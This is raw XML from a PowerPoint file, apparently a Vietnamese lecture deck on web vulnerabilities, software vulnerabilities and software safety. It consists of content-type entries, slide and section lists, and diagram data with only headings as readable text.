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2.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+xml"/>
  <Override PartName="/ppt/diagrams/data1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+xml"/>
  <Override PartName="/ppt/diagrams/data3.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+xml"/>
  <Override PartName="/ppt/slides/slide5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9.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8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+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Layouts/slideLayout14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout12.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3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/diagrams/quickStyle1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyle+xml"/>
  <Override PartName="/ppt/diagrams/colors6.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+xml"/>
  <Override PartName="/ppt/diagrams/colors1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+xml"/>
  <Override PartName="/ppt/diagrams/drawing2.xml" ContentType="application/vnd.ms-office.drawingml.diagramDrawing+xml"/>
  <Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+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drawing1.xml" ContentType="application/vnd.ms-office.drawingml.diagramDrawing+xml"/>
  <Override PartName="/ppt/theme/theme3.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drawing6.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diagrams/layout4.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+xml"/>
  <Override PartName="/ppt/diagrams/drawing4.xml" ContentType="application/vnd.ms-office.drawingml.diagramDrawing+xml"/>
  <Override PartName="/ppt/commentAuthors.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.commentAuthors+xml"/>
  <Override PartName="/ppt/diagrams/layout5.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+xml"/>
  <Override PartName="/ppt/notesMasters/notesMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesMaster+xml"/>
  <Override PartName="/ppt/diagrams/layout6.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+xml"/>
  <Override PartName="/ppt/handoutMasters/handoutMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.handoutMaster+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diagrams/quickStyle6.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyle+xml"/>
  <Override PartName="/ppt/diagrams/colors3.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+xml"/>
  <Override PartName="/ppt/diagrams/layout3.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+xml"/>
  <Override PartName="/ppt/diagrams/quickStyle3.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyle+xml"/>
  <Override PartName="/ppt/diagrams/drawing3.xml" ContentType="application/vnd.ms-office.drawingml.diagramDrawing+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256" r:id="rId2"/>
    <p:sldId id="537" r:id="rId3"/>
    <p:sldId id="340" r:id="rId4"/>
    <p:sldId id="521" r:id="rId5"/>
    <p:sldId id="476" r:id="rId6"/>
    <p:sldId id="480" r:id="rId7"/>
    <p:sldId id="486" r:id="rId8"/>
    <p:sldId id="536" r:id="rId9"/>
    <p:sldId id="487" r:id="rId10"/>
    <p:sldId id="488" r:id="rId11"/>
    <p:sldId id="489" r:id="rId12"/>
    <p:sldId id="490" r:id="rId13"/>
    <p:sldId id="541" r:id="rId14"/>
    <p:sldId id="491" r:id="rId15"/>
    <p:sldId id="492" r:id="rId16"/>
    <p:sldId id="493" r:id="rId17"/>
    <p:sldId id="494" r:id="rId18"/>
    <p:sldId id="495" r:id="rId19"/>
    <p:sldId id="496" r:id="rId20"/>
    <p:sldId id="497" r:id="rId21"/>
    <p:sldId id="498" r:id="rId22"/>
    <p:sldId id="499" r:id="rId23"/>
    <p:sldId id="538" r:id="rId24"/>
    <p:sldId id="500" r:id="rId25"/>
    <p:sldId id="501" r:id="rId26"/>
    <p:sldId id="502" r:id="rId27"/>
    <p:sldId id="503" r:id="rId28"/>
    <p:sldId id="504" r:id="rId29"/>
    <p:sldId id="505" r:id="rId30"/>
    <p:sldId id="506" r:id="rId31"/>
    <p:sldId id="535" r:id="rId32"/>
    <p:sldId id="522" r:id="rId33"/>
    <p:sldId id="477" r:id="rId34"/>
    <p:sldId id="514" r:id="rId35"/>
    <p:sldId id="539" r:id="rId36"/>
    <p:sldId id="478" r:id="rId37"/>
    <p:sldId id="519" r:id="rId38"/>
    <p:sldId id="516" r:id="rId39"/>
    <p:sldId id="517" r:id="rId40"/>
    <p:sldId id="509" r:id="rId41"/>
    <p:sldId id="515" r:id="rId42"/>
    <p:sldId id="518" r:id="rId43"/>
    <p:sldId id="512" r:id="rId44"/>
    <p:sldId id="513" r:id="rId45"/>
    <p:sldId id="479" r:id="rId46"/>
    <p:sldId id="520" r:id="rId47"/>
    <p:sldId id="508" r:id="rId48"/>
    <p:sldId id="540" r:id="rId49"/>
    <p:sldId id="532" r:id="rId50"/>
    <p:sldId id="524" r:id="rId51"/>
    <p:sldId id="525" r:id="rId52"/>
    <p:sldId id="526" r:id="rId53"/>
    <p:sldId id="527" r:id="rId54"/>
    <p:sldId id="528" r:id="rId55"/>
    <p:sldId id="482" r:id="rId56"/>
    <p:sldId id="529" r:id="rId57"/>
    <p:sldId id="530" r:id="rId58"/>
    <p:sldId id="531" r:id="rId59"/>
    <p:sldId id="481" r:id="rId6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E43C8-39AC-478F-B5A0-7501E605B677}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="537"/>
            <p14:sldId id="340"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Lỗ hổng web" id="{7ECD22BB-A909-4A94-86EB-C84EA9A73197}">
          <p14:sldIdLst>
            <p14:sldId id="521"/>
            <p14:sldId id="476"/>
            <p14:sldId id="480"/>
            <p14:sldId id="486"/>
            <p14:sldId id="536"/>
            <p14:sldId id="487"/>
            <p14:sldId id="488"/>
            <p14:sldId id="489"/>
            <p14:sldId id="490"/>
            <p14:sldId id="541"/>
            <p14:sldId id="491"/>
            <p14:sldId id="492"/>
            <p14:sldId id="493"/>
            <p14:sldId id="494"/>
            <p14:sldId id="495"/>
            <p14:sldId id="496"/>
            <p14:sldId id="497"/>
            <p14:sldId id="498"/>
            <p14:sldId id="499"/>
            <p14:sldId id="538"/>
            <p14:sldId id="500"/>
            <p14:sldId id="501"/>
            <p14:sldId id="502"/>
            <p14:sldId id="503"/>
            <p14:sldId id="504"/>
            <p14:sldId id="505"/>
            <p14:sldId id="506"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Lỗ hổng phần mềm" id="{ED28AEDB-255E-4697-B1ED-AC86CE4F4698}">
          <p14:sldIdLst>
            <p14:sldId id="535"/>
            <p14:sldId id="522"/>
            <p14:sldId id="477"/>
            <p14:sldId id="514"/>
            <p14:sldId id="539"/>
            <p14:sldId id="478"/>
            <p14:sldId id="519"/>
            <p14:sldId id="516"/>
            <p14:sldId id="517"/>
            <p14:sldId id="509"/>
            <p14:sldId id="515"/>
            <p14:sldId id="518"/>
            <p14:sldId id="512"/>
            <p14:sldId id="513"/>
            <p14:sldId id="479"/>
            <p14:sldId id="520"/>
            <p14:sldId id="508"/>
            <p14:sldId id="540"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="An toàn phần mềm" id="{36DC1F98-2F88-4ED5-B0A8-D3AB9AF6A0E6}">
          <p14:sldIdLst>
            <p14:sldId id="532"/>
            <p14:sldId id="524"/>
            <p14:sldId id="525"/>
            <p14:sldId id="526"/>
            <p14:sldId id="527"/>
            <p14:sldId id="528"/>
            <p14:sldId id="482"/>
            <p14:sldId id="529"/>
            <p14:sldId id="530"/>
            <p14:sldId id="531"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Các bài thực hành" id="{31482B67-B563-40AD-BD7B-9A37BF824E4F}">
          <p14:sldIdLst>
            <p14:sldId id="48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FF00FF"/>
    <a:srgbClr val="0A01C3"/>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9244" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="61" d="100"/>
          <a:sy n="61" d="100"/>
        </p:scale>
        <p:origin x="2102" y="3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49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commentAuthors" Target="commentAuthors.xml"/><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Lỗ hổng web</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Lỗ hổng phần mềm</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79338AE-DC9F-4A52-B28E-1291486E4517}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="vi-VN" noProof="0" dirty="0" smtClean="0"/>
            <a:t>3</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" noProof="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C779D05-F57F-49F4-AB58-6E152072210E}" type="parTrans" cxnId="{6E39188D-614A-4B96-B935-DE4D7F7BBFDE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{032C08A4-BE1B-4162-BA48-5B1D5D8815BF}" type="sibTrans" cxnId="{6E39188D-614A-4B96-B935-DE4D7F7BBFDE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E073F9E-A952-410B-B079-D921482E3FA4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="vi-VN" noProof="0" dirty="0" smtClean="0"/>
            <a:t>An toàn phần mềm</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41BCF2B2-01A0-484D-A227-D07C0152D452}" type="pres">
      <dgm:prSet presAssocID="{379338AE-DC9F-4A52-B28E-1291486E4517}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0C8BDA2F-5127-4262-8E68-2BE45D20E5D3}" type="pres">
      <dgm:prSet presAssocID="{379338AE-DC9F-4A52-B28E-1291486E4517}" presName="desTx" presStyleLbl="fgAccFollowNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D70D653B-49D3-4408-92E5-E8EA23C919E8}" type="pres">
      <dgm:prSet presAssocID="{379338AE-DC9F-4A52-B28E-1291486E4517}" presName="labelTx" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{1C7B2439-98A6-4A2B-BDB8-438079493C67}" srcId="{8C66E9B3-B12D-4C23-A273-982D7F969BBC}" destId="{759FDF1A-46CB-4DD6-A232-39900ACE14DF}" srcOrd="1" destOrd="0" parTransId="{EBD1FDD3-F3E1-4EF5-AB02-3A05A129FFE4}" sibTransId="{840B7BEC-A424-4364-B52E-A493DF1255BE}"/>
    <dgm:cxn modelId="{7F37D5C8-E16A-4389-ABBC-ABB93E9EB1A4}" srcId="{6C03E07F-ECFB-4D2F-BA96-D23DA7C5AC73}" destId="{9EA58EC5-7D69-4397-8093-5A4FCBD369E8}" srcOrd="0" destOrd="0" parTransId="{D56EEE90-AC73-4E4D-8BBC-6E0E7885DFB1}" sibTransId="{D5E5875A-C60C-4FC3-869B-722E371FA6E0}"/>
    <dgm:cxn modelId="{B97F3FAE-3AF0-4808-8C8A-4E9A2B41D65D}" type="presOf" srcId="{379338AE-DC9F-4A52-B28E-1291486E4517}" destId="{D70D653B-49D3-4408-92E5-E8EA23C919E8}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{1E4F1B7C-FB3D-48C4-96E1-55469EE72B83}" type="presOf" srcId="{1E073F9E-A952-410B-B079-D921482E3FA4}" destId="{0C8BDA2F-5127-4262-8E68-2BE45D20E5D3}"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740F8903-5739-4710-9802-9B1B3A04DE18}" srcId="{8C66E9B3-B12D-4C23-A273-982D7F969BBC}" destId="{6C03E07F-ECFB-4D2F-BA96-D23DA7C5AC73}" srcOrd="0" destOrd="0" parTransId="{D1FC4842-2686-45D4-A56A-3F897EF3B16F}" sibTransId="{E35E76B6-7078-4B09-B349-C02F66AA5978}"/>
    <dgm:cxn modelId="{7DE84081-C82B-4DBF-BD2A-34FB9CB31DB4}" srcId="{379338AE-DC9F-4A52-B28E-1291486E4517}" destId="{1E073F9E-A952-410B-B079-D921482E3FA4}" srcOrd="0" destOrd="0" parTransId="{D650692B-9DFA-4C62-905B-EED2C95C7358}" sibTransId="{05857875-BC1E-454A-B60B-68199207A48E}"/>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CED0B9D0-E2DC-4CB1-A2C1-36298657AC7B}" type="presOf" srcId="{6C03E07F-ECFB-4D2F-BA96-D23DA7C5AC73}" destId="{7D701CF5-2CC3-48B9-A656-E2968A10AA3B}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{89F6AEB2-4790-487C-AC1B-D20A20054F51}" type="presOf" srcId="{9EA58EC5-7D69-4397-8093-5A4FCBD369E8}" destId="{A08A9154-0BEB-4230-91C9-16FAC1EF6E1C}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{6E39188D-614A-4B96-B935-DE4D7F7BBFDE}" srcId="{8C66E9B3-B12D-4C23-A273-982D7F969BBC}" destId="{379338AE-DC9F-4A52-B28E-1291486E4517}" srcOrd="2" destOrd="0" parTransId="{0C779D05-F57F-49F4-AB58-6E152072210E}" sibTransId="{032C08A4-BE1B-4162-BA48-5B1D5D8815BF}"/>
    <dgm:cxn modelId="{314C4E73-477B-4DFC-A12A-BEB22C372D5A}" type="presOf" srcId="{8C66E9B3-B12D-4C23-A273-982D7F969BBC}" destId="{BDFB8683-95A4-4BBF-9344-3A0D69314DBB}"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41E6AD03-1749-48C1-BC02-36928CABE1F9}" type="presParOf" srcId="{BDFB8683-95A4-4BBF-9344-3A0D69314DBB}" destId="{41BCF2B2-01A0-484D-A227-D07C0152D452}" srcOrd="4" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{759F8297-5756-47A3-89A7-AC9CA0734200}" type="presParOf" srcId="{41BCF2B2-01A0-484D-A227-D07C0152D452}" destId="{0C8BDA2F-5127-4262-8E68-2BE45D20E5D3}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{603F48AB-312C-4DC5-A933-B8160868015E}" type="presParOf" srcId="{41BCF2B2-01A0-484D-A227-D07C0152D452}" destId="{D70D653B-49D3-4408-92E5-E8EA23C919E8}"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a:solidFill>
          <a:srgbClr val="00FF00"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="vi-VN" b="0" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Lỗ hổng web</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Lỗ hổng phần mềm</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1E073F9E-A952-410B-B079-D921482E3FA4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="vi-VN" noProof="0" dirty="0" smtClean="0"/>
            <a:t>An toàn phần mềm</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12A329E-CC27-45DE-A5DE-298884D585ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
            <a:t>3</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12423EED-6E6F-4D2D-B936-73FC4D814774}" type="sibTrans" cxnId="{606EC078-C408-4AB6-A448-409451D143BF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10CDAF44-EF43-4C8F-873E-D5F671BB181F}" type="parTrans" cxnId="{606EC078-C408-4AB6-A448-409451D143BF}">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BB8A5424-E25B-48A5-AFBF-D81A1A8DD4E7}" type="pres">
      <dgm:prSet presAssocID="{B12A329E-CC27-45DE-A5DE-298884D585ED}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EEC65F55-2BA0-441A-8866-F7EE2965C87B}" type="pres">
      <dgm:prSet presAssocID="{B12A329E-CC27-45DE-A5DE-298884D585ED}" presName="desTx" presStyleLbl="fgAccFollowNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D21A5F8-FD2A-4CC7-B3EF-BA8E3942F07E}" type="pres">
      <dgm:prSet presAssocID="{B12A329E-CC27-45DE-A5DE-298884D585ED}" presName="labelTx" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{314C4E73-477B-4DFC-A12A-BEB22C372D5A}" type="presOf" srcId="{8C66E9B3-B12D-4C23-A273-982D7F969BBC}" destId="{BDFB8683-95A4-4BBF-9344-3A0D69314DBB}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{5C3EBDE3-F85D-49FA-8844-5707A71C7AF6}" type="presOf" srcId="{1E073F9E-A952-410B-B079-D921482E3FA4}" destId="{EEC65F55-2BA0-441A-8866-F7EE2965C87B}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{BC8C42DE-1FE3-47D5-B6B5-91571D0EB19A}" type="presOf" srcId="{759FDF1A-46CB-4DD6-A232-39900ACE14DF}" destId="{52D715E9-012B-492D-85DB-CC49546E7451}"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606EC078-C408-4AB6-A448-409451D143BF}" srcId="{8C66E9B3-B12D-4C23-A273-982D7F969BBC}" destId="{B12A329E-CC27-45DE-A5DE-298884D585ED}" srcOrd="2" destOrd="0" parTransId="{10CDAF44-EF43-4C8F-873E-D5F671BB181F}" sibTransId="{12423EED-6E6F-4D2D-B936-73FC4D814774}"/>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7DE84081-C82B-4DBF-BD2A-34FB9CB31DB4}" srcId="{B12A329E-CC27-45DE-A5DE-298884D585ED}" destId="{1E073F9E-A952-410B-B079-D921482E3FA4}" srcOrd="0" destOrd="0" parTransId="{D650692B-9DFA-4C62-905B-EED2C95C7358}" sibTransId="{05857875-BC1E-454A-B60B-68199207A48E}"/>
    <dgm:cxn modelId="{89F6AEB2-4790-487C-AC1B-D20A20054F51}" type="presOf" srcId="{9EA58EC5-7D69-4397-8093-5A4FCBD369E8}" destId="{A08A9154-0BEB-4230-91C9-16FAC1EF6E1C}"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4FEA2164-3BE0-4E61-B75E-AEF39B1F2749}" type="presOf" srcId="{B12A329E-CC27-45DE-A5DE-298884D585ED}" destId="{6D21A5F8-FD2A-4CC7-B3EF-BA8E3942F07E}"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EE26D499-E3C7-4874-A873-C7C102CF342B}" type="presOf" srcId="{374B3CF0-3CBE-41CF-A774-9FD3C3CD3C85}" destId="{5012D0F9-E426-4C44-85B1-B5D15A7B4879}"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A61E2857-4383-4230-B356-F45FFEF04549}" type="presParOf" srcId="{BDFB8683-95A4-4BBF-9344-3A0D69314DBB}" destId="{BB8A5424-E25B-48A5-AFBF-D81A1A8DD4E7}" srcOrd="4" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{0E46E9B4-27F6-4A46-A942-970DB0D67ACE}" type="presParOf" srcId="{BB8A5424-E25B-48A5-AFBF-D81A1A8DD4E7}" destId="{EEC65F55-2BA0-441A-8866-F7EE2965C87B}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{8AB953A0-0105-4947-803E-B386E7A0B528}" type="presParOf" srcId="{BB8A5424-E25B-48A5-AFBF-D81A1A8DD4E7}" destId="{6D21A5F8-FD2A-4CC7-B3EF-BA8E3942F07E}"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Lỗ hổng web</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a:solidFill>
          <a:srgbClr val="00FF00"/>
        </a:solidFill>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a:solidFill>
          <a:srgbClr val="00FF00"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="vi-VN" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Lỗ hổng phần mềm</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79338AE-DC9F-4A52-B28E-1291486E4517}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="vi-VN" noProof="0" dirty="0" smtClean="0"/>
            <a:t>3</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" noProof="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C779D05-F57F-49F4-AB58-6E152072210E}" type="parTrans" cxnId="{6E39188D-614A-4B96-B935-DE4D7F7BBFDE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{032C08A4-BE1B-4162-BA48-5B1D5D8815BF}" type="sibTrans" cxnId="{6E39188D-614A-4B96-B935-DE4D7F7BBFDE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E073F9E-A952-410B-B079-D921482E3FA4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="vi-VN" noProof="0" dirty="0" smtClean="0"/>
            <a:t>An toàn phần mềm</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41BCF2B2-01A0-484D-A227-D07C0152D452}" type="pres">
      <dgm:prSet presAssocID="{379338AE-DC9F-4A52-B28E-1291486E4517}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0C8BDA2F-5127-4262-8E68-2BE45D20E5D3}" type="pres">
      <dgm:prSet presAssocID="{379338AE-DC9F-4A52-B28E-1291486E4517}" presName="desTx" presStyleLbl="fgAccFollowNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D70D653B-49D3-4408-92E5-E8EA23C919E8}" type="pres">
      <dgm:prSet presAssocID="{379338AE-DC9F-4A52-B28E-1291486E4517}" presName="labelTx" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{6E39188D-614A-4B96-B935-DE4D7F7BBFDE}" srcId="{8C66E9B3-B12D-4C23-A273-982D7F969BBC}" destId="{379338AE-DC9F-4A52-B28E-1291486E4517}" srcOrd="2" destOrd="0" parTransId="{0C779D05-F57F-49F4-AB58-6E152072210E}" sibTransId="{032C08A4-BE1B-4162-BA48-5B1D5D8815BF}"/>
    <dgm:cxn modelId="{314C4E73-477B-4DFC-A12A-BEB22C372D5A}"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BC8C42DE-1FE3-47D5-B6B5-91571D0EB19A}" type="presOf" srcId="{759FDF1A-46CB-4DD6-A232-39900ACE14DF}" destId="{52D715E9-012B-492D-85DB-CC49546E7451}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>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7DE84081-C82B-4DBF-BD2A-34FB9CB31DB4}" srcId="{379338AE-DC9F-4A52-B28E-1291486E4517}" destId="{1E073F9E-A952-410B-B079-D921482E3FA4}" srcOrd="0" destOrd="0" parTransId="{D650692B-9DFA-4C62-905B-EED2C95C7358}" sibTransId="{05857875-BC1E-454A-B60B-68199207A48E}"/>
    <dgm:cxn modelId="{89F6AEB2-4790-487C-AC1B-D20A20054F51}" type="presOf" srcId="{9EA58EC5-7D69-4397-8093-5A4FCBD369E8}" destId="{A08A9154-0BEB-4230-91C9-16FAC1EF6E1C}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{B97F3FAE-3AF0-4808-8C8A-4E9A2B41D65D}" type="presOf" srcId="{379338AE-DC9F-4A52-B28E-1291486E4517}" destId="{D70D653B-49D3-4408-92E5-E8EA23C919E8}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{EEA7828E-03F6-43FB-A1E3-D6D83C01970A}" type="presOf" srcId="{1E073F9E-A952-410B-B079-D921482E3FA4}" destId="{0C8BDA2F-5127-4262-8E68-2BE45D20E5D3}"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1C7B2439-98A6-4A2B-BDB8-438079493C67}" srcId="{8C66E9B3-B12D-4C23-A273-982D7F969BBC}" destId="{759FDF1A-46CB-4DD6-A232-39900ACE14DF}" srcOrd="1" destOrd="0" parTransId="{EBD1FDD3-F3E1-4EF5-AB02-3A05A129FFE4}" sibTransId="{840B7BEC-A424-4364-B52E-A493DF1255BE}"/>
    <dgm:cxn modelId="{EE26D499-E3C7-4874-A873-C7C102CF342B}" type="presOf" srcId="{374B3CF0-3CBE-41CF-A774-9FD3C3CD3C85}" destId="{5012D0F9-E426-4C44-85B1-B5D15A7B4879}"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41E6AD03-1749-48C1-BC02-36928CABE1F9}" type="presParOf" srcId="{BDFB8683-95A4-4BBF-9344-3A0D69314DBB}" destId="{41BCF2B2-01A0-484D-A227-D07C0152D452}" srcOrd="4" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{759F8297-5756-47A3-89A7-AC9CA0734200}" type="presParOf" srcId="{41BCF2B2-01A0-484D-A227-D07C0152D452}" destId="{0C8BDA2F-5127-4262-8E68-2BE45D20E5D3}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{603F48AB-312C-4DC5-A933-B8160868015E}" type="presParOf" srcId="{41BCF2B2-01A0-484D-A227-D07C0152D452}" destId="{D70D653B-49D3-4408-92E5-E8EA23C919E8}"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Lỗ hổng web</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Lỗ hổng phần mềm</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79338AE-DC9F-4A52-B28E-1291486E4517}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00FF00"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="vi-VN" noProof="0" dirty="0" smtClean="0"/>
            <a:t>3</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" noProof="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C779D05-F57F-49F4-AB58-6E152072210E}" type="parTrans" cxnId="{6E39188D-614A-4B96-B935-DE4D7F7BBFDE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
